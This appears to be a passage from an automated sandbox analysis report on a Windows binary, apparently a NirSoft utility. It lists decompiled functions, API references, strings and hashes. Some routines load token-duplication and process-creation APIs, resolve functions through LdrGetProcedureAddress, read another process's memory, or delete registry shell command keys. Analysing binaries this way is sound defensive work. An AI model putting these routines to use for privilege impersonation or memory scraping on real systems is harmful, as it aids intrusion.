                                                                                                                            0x004062d3
                                                                                                                            0x004062da
                                                                                                                            0x004062f1
                                                                                                                            0x004062f7
                                                                                                                            0x004062fe
                                                                                                                            0x0040630d
                                                                                                                            0x00406312
                                                                                                                            0x0040631e
                                                                                                                            0x00406327
                                                                                                                            0x00406275
                                                                                                                            0x00406283
                                                                                                                            0x00406283
                                                                                                                            0x00406285
                                                                                                                            0x00406287
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406277
                                                                                                                            0x0040627a
                                                                                                                            0x00406280
                                                                                                                            0x00406280
                                                                                                                            0x00000000
                                                                                                                            0x00406280
                                                                                                                            0x00000000
                                                                                                                            0x0040627a
                                                                                                                            0x00000000
                                                                                                                            0x00406283
                                                                                                                            0x00406273
                                                                                                                            0x00406224
                                                                                                                            0x00406224
                                                                                                                            0x00406229
                                                                                                                            0x0040622a
                                                                                                                            0x0040622f
                                                                                                                            0x00406236
                                                                                                                            0x0040623c
                                                                                                                            0x00406243
                                                                                                                            0x00406245
                                                                                                                            0x00406247
                                                                                                                            0x00406248
                                                                                                                            0x0040624b
                                                                                                                            0x00406254
                                                                                                                            0x00406254
                                                                                                                            0x0040632d
                                                                                                                            0x00406334

                                                                                                                            APIs
                                                                                                                            • LoadMenuW.USER32 ref: 00406236
                                                                                                                              • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                                              • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                                              • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                                              • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                                            • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                                            • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                                            • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                                            • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                                            • memset.MSVCRT ref: 004062DA
                                                                                                                            • GetWindowTextW.USER32 ref: 004062F1
                                                                                                                            • EnumChildWindows.USER32 ref: 0040631E
                                                                                                                            • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                                              • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                            • String ID: caption
                                                                                                                            • API String ID: 973020956-4135340389
                                                                                                                            • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                            • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                                            • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                            • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 65%
                                                                                                                            			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

















                                                                                                                            0x004081e4
                                                                                                                            0x004081ec
                                                                                                                            0x004081fc
                                                                                                                            0x00408200
                                                                                                                            0x00408215
                                                                                                                            0x0040821c
                                                                                                                            0x0040822a
                                                                                                                            0x00408231
                                                                                                                            0x0040823f
                                                                                                                            0x00408246
                                                                                                                            0x0040824b
                                                                                                                            0x0040824e
                                                                                                                            0x0040825a
                                                                                                                            0x0040825c
                                                                                                                            0x00408261
                                                                                                                            0x0040826c
                                                                                                                            0x0040826d
                                                                                                                            0x0040826e
                                                                                                                            0x00408273
                                                                                                                            0x00408273
                                                                                                                            0x00408276
                                                                                                                            0x0040827c
                                                                                                                            0x0040828a
                                                                                                                            0x00408290
                                                                                                                            0x004082ab
                                                                                                                            0x004082c5
                                                                                                                            0x004082c6
                                                                                                                            0x004082d1
                                                                                                                            0x004082d2
                                                                                                                            0x004082d3
                                                                                                                            0x004082e7
                                                                                                                            0x004082ec
                                                                                                                            0x004082f0
                                                                                                                            0x00000000
                                                                                                                            0x004082f5
                                                                                                                            0x004082fe

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                                            • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$_snwprintf$wcscpy
                                                                                                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                            • API String ID: 1283228442-2366825230
                                                                                                                            • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                            • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                                            • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                            • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 85%
                                                                                                                            			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                                                            0x0040920a
                                                                                                                            0x00409218
                                                                                                                            0x00409223
                                                                                                                            0x0040922c
                                                                                                                            0x0040924b
                                                                                                                            0x00409253
                                                                                                                            0x0040929b
                                                                                                                            0x004092e4
                                                                                                                            0x0040929d
                                                                                                                            0x004092a3
                                                                                                                            0x004092b1
                                                                                                                            0x004092bd
                                                                                                                            0x004092cc
                                                                                                                            0x004092d1
                                                                                                                            0x004092d8
                                                                                                                            0x004092dd
                                                                                                                            0x00409255
                                                                                                                            0x0040925b
                                                                                                                            0x00409269
                                                                                                                            0x00409275
                                                                                                                            0x00409282
                                                                                                                            0x0040928d
                                                                                                                            0x00409292
                                                                                                                            0x004092ec
                                                                                                                            0x004092ef
                                                                                                                            0x004092ef
                                                                                                                            0x00409231
                                                                                                                            0x00409232
                                                                                                                            0x00409233
                                                                                                                            0x00000000
                                                                                                                            0x00409239
                                                                                                                            0x0040921a
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • wcschr.MSVCRT ref: 00409223
                                                                                                                            • wcscpy.MSVCRT ref: 00409233
                                                                                                                              • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                                              • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                                              • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                                            • wcscpy.MSVCRT ref: 00409282
                                                                                                                            • wcscat.MSVCRT ref: 0040928D
                                                                                                                            • memset.MSVCRT ref: 00409269
                                                                                                                              • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                                              • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                                            • memset.MSVCRT ref: 004092B1
                                                                                                                            • memcpy.MSVCRT ref: 004092CC
                                                                                                                            • wcscat.MSVCRT ref: 004092D8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                            • String ID: \systemroot
                                                                                                                            • API String ID: 4173585201-1821301763
                                                                                                                            • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                            • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                                            • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                            • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63librarystringloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 48%
                                                                                                                            			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}
















                                                                                                                            0x00409c73
                                                                                                                            0x00409c7c
                                                                                                                            0x00409c90
                                                                                                                            0x00409c9f
                                                                                                                            0x00409ca2
                                                                                                                            0x00409ca7
                                                                                                                            0x00409ca9
                                                                                                                            0x00409cb1
                                                                                                                            0x00409cc0
                                                                                                                            0x00409cc2
                                                                                                                            0x00409cc7
                                                                                                                            0x00409ccf
                                                                                                                            0x00409cd0
                                                                                                                            0x00409cd7
                                                                                                                            0x00409cd8
                                                                                                                            0x00409cd9
                                                                                                                            0x00409cda
                                                                                                                            0x00409cdc
                                                                                                                            0x00409ce0
                                                                                                                            0x00409ce1
                                                                                                                            0x00409ce9
                                                                                                                            0x00409cf1
                                                                                                                            0x00409cfb
                                                                                                                            0x00409d08
                                                                                                                            0x00409d08
                                                                                                                            0x00000000
                                                                                                                            0x00409d0d
                                                                                                                            0x00409d0f

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                            • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                            • strlen.MSVCRT ref: 00409CE4
                                                                                                                            • strlen.MSVCRT ref: 00409CF1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProcstrlen
                                                                                                                            • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                                            • API String ID: 1027343248-2054640941
                                                                                                                            • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                            • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                                            • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                            • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}






                                                                                                                            0x004028a3
                                                                                                                            0x004028ab
                                                                                                                            0x004028bd
                                                                                                                            0x004028ca
                                                                                                                            0x004028d7
                                                                                                                            0x004028e3
                                                                                                                            0x004028e6
                                                                                                                            0x004028e8
                                                                                                                            0x00000000
                                                                                                                            0x004028eb
                                                                                                                            0x004028ec

                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                            • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                            • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                            • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                                            • API String ID: 2238633743-1970996977
                                                                                                                            • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                            • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                                                            • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                            • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 79%
                                                                                                                            			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t48;
				void* _t56;
				signed int _t57;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
						E004055D1(_t61,  &_v28);
					}
					E004055D1(CloseHandle(_a16),  &_v564);
				}
				return _t69;
			}


























                                                                                                                            0x00401ac9
                                                                                                                            0x00401ad1
                                                                                                                            0x00401ae1
                                                                                                                            0x00401ae7
                                                                                                                            0x00401ae9
                                                                                                                            0x00401aec
                                                                                                                            0x00401c1b
                                                                                                                            0x00401af2
                                                                                                                            0x00401af2
                                                                                                                            0x00401af8
                                                                                                                            0x00401b0c
                                                                                                                            0x00401b1a
                                                                                                                            0x00401bfd
                                                                                                                            0x00401b20
                                                                                                                            0x00401b26
                                                                                                                            0x00401b2b
                                                                                                                            0x00401b36
                                                                                                                            0x00401b40
                                                                                                                            0x00401b43
                                                                                                                            0x00401b4a
                                                                                                                            0x00401b54
                                                                                                                            0x00401b55
                                                                                                                            0x00401b56
                                                                                                                            0x00401b57
                                                                                                                            0x00401b58
                                                                                                                            0x00401b63
                                                                                                                            0x00401b68
                                                                                                                            0x00401b69
                                                                                                                            0x00401b77
                                                                                                                            0x00401b7d
                                                                                                                            0x00401b82
                                                                                                                            0x00401b82
                                                                                                                            0x00401b88
                                                                                                                            0x00401b8b
                                                                                                                            0x00401b8e
                                                                                                                            0x00401b91
                                                                                                                            0x00401b98
                                                                                                                            0x00401b9b
                                                                                                                            0x00401ba0
                                                                                                                            0x00401ba5
                                                                                                                            0x00401baa
                                                                                                                            0x00401bac
                                                                                                                            0x00401bac
                                                                                                                            0x00401bb2
                                                                                                                            0x00401bb2
                                                                                                                            0x00401bbe
                                                                                                                            0x00401bc4
                                                                                                                            0x00401bc6
                                                                                                                            0x00401bc8
                                                                                                                            0x00401bc8
                                                                                                                            0x00401bd7
                                                                                                                            0x00401bee
                                                                                                                            0x00401bf0
                                                                                                                            0x00401bf0
                                                                                                                            0x00401c0e
                                                                                                                            0x00401c0e
                                                                                                                            0x00401c23

                                                                                                                            APIs
                                                                                                                            • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                                            • ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                                            • memset.MSVCRT ref: 00401B4A
                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                                            • _snwprintf.MSVCRT ref: 00401B69
                                                                                                                              • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                              • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                            • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                                            • CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                                            • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
                                                                                                                            • String ID: %d %I64x
                                                                                                                            • API String ID: 2567117392-2565891505
                                                                                                                            • Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                            • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                                            • Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                            • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 39%
                                                                                                                            			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}










                                                                                                                            0x004045c2
                                                                                                                            0x004045d1
                                                                                                                            0x004045da
                                                                                                                            0x004045ef
                                                                                                                            0x004045f6
                                                                                                                            0x00404604
                                                                                                                            0x0040460b
                                                                                                                            0x00404610
                                                                                                                            0x00404616
                                                                                                                            0x00404617
                                                                                                                            0x00404618
                                                                                                                            0x00404628
                                                                                                                            0x00404629
                                                                                                                            0x0040462a
                                                                                                                            0x0040462f
                                                                                                                            0x00404630
                                                                                                                            0x00404631
                                                                                                                            0x0040463c
                                                                                                                            0x0040463d
                                                                                                                            0x0040463e
                                                                                                                            0x00404656
                                                                                                                            0x00404662
                                                                                                                            0x0040466b
                                                                                                                            0x0040466d
                                                                                                                            0x0040466e
                                                                                                                            0x00404674
                                                                                                                            0x00404679

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Delete_snwprintfmemset$Close
                                                                                                                            • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                                            • API String ID: 1018939227-3575174989
